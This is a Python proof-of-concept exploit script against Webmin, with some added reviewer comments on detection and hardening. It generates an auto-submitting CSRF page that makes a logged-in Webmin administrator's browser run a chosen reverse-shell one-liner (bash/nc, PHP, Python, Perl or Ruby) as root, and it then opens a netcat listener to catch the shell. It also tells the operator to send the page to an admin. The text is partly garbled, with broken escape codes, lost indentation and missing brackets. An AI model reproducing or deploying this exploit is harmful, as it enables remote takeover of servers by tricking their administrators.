EXP
import time, subprocess,random
# Start-up output only: an ASCII-art banner followed by a 0-100 counter that
# shows the author credits. Nothing in this run of statements touches the
# network or the filesystem.
# NOTE(review): the colour escapes appear as `\0331;...m` on this page and the
# e-mail addresses as "email protected"; both look like extraction damage.
print('''\0331;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\0331;m''')
# Redraws one status line 101 times (i = 0..100), pausing 0.02 s per step,
# so the credits appear next to a percentage counter.
for i in range(101):
print(
"\r\0331;36m > POC By \0331;m \0331;37mMesh3l\0331;m \0331;36m ( \0331;m\0331;email protected_911\0331;m\0331;36m ) & \0331;m \0331;37mZ0ldyck\0331;m\0331;36m ( \0331;m\0331;email protected\0331;m\0331;36m ) \0331;m {} \0331;m".format(
i), "\0331;36m%\0331;m", end="")
time.sleep(0.02)
print("\n\n")
# Prompt 1: base URL of a Webmin instance. The script appends `proc/run.cgi`
# (adding a slash when needed), so that path is the request target to look
# for in Webmin access logs and reverse-proxy logs.
target = input(
"\0331;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \0331;m")
if target.endswith('/'):
target = target + 'proc/run.cgi'
else:
target = target + '/proc/run.cgi'
# Prompts 2 and 3: callback address and port. Both stay raw strings and are
# concatenated into the command templates below without validation.
ip = input("\0331;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \0331;m")
port = input("\0331;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \0331;m")
# Prompt 4: menu number selecting one of the five command templates.
ReverseShell = input \
('''\0331;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\0331;m
\0331;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \0331;m''')
# Random integer in 0..999; only template 1 uses it, as a file name under /tmp.
file_name = random.randrange(1000)
# Each branch replaces ReverseShell with a one-line command string.
# Detection anchor shared by all five templates: `nc` or an interpreter
# (php, python, perl, ruby) opens an outbound TCP connection and attaches
# `/bin/sh` to it. Presumably that process is a child of Webmin once the
# generated form is processed -- confirm against host process telemetry.
if ReverseShell == '1':
# Template 1 also creates, then removes, a numerically named FIFO in /tmp.
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call("/bin/sh","-i");' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
# Only a message is printed here; no exit or re-prompt follows, so the
# script carries on with ReverseShell still holding the raw menu input.
print("\0331;36m \n Please Re-Check ur input :( \0331;m \n")
# Writes `CSRF_POC.html` into the current working directory. The file holds a
# hidden form that POSTs to the module-level `target` plus a script that
# submits it on page load, so the request is issued by the browser of whoever
# opens the file; the closing message names a Webmin administrator as the
# intended recipient. Takes no arguments and returns None.
#
# What the request looks like, for log review and rule writing:
#   - POST to <base>/proc/run.cgi with fields cmd, mode=0, user=root, input
#     and undefined (cmd carries the module-level `ReverseShell` string);
#   - the `referrer` meta tag asks the browser to send no Referer header.
# Presumably the technique depends on Webmin accepting a state-changing
# request without a same-site referrer -- confirm the affected releases
# against the vendor advisory. Hardening that follows from the listing: keep
# Webmin's referrer checking enabled, do not trust requests with an unknown or
# absent referrer, and avoid browsing untrusted content in a browser that
# holds an authenticated Webmin session.
def CSRF_Generator():
# Mode 'w' truncates any existing CSRF_POC.html.
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="''' + target +'''" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms0.submit();
</script>
</body>
</html>
''')
# NOTE(review): looks redundant if this call sits inside the `with` block,
# which closes the file on exit; the page has lost its indentation.
POC.close()
# Status message only; delivery of the file is left to the operator.
print(
"\0331;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \0331;m")
# Prints a blank line, then calls subprocess.run with "nc" and a "-nlvp <port>"
# string built from the module-level `port`. This runs on the operator's own
# machine; nothing in this function contacts the Webmin host.
def Netcat_listener():
print()
subprocess.run("nc", "-nlvp "+port+"")
# Entry point: writes the HTML file first, then starts the local listener.
# Both helpers read the module-level values collected by the prompts above.
def main():
CSRF_Generator()
Netcat_listener()
# Only main() is guarded. The banner, the prompts and the payload selection
# earlier in the file are module-level statements, so they presumably run on
# import as well (indentation is lost on this page).
if __name__ == '__main__':
main()

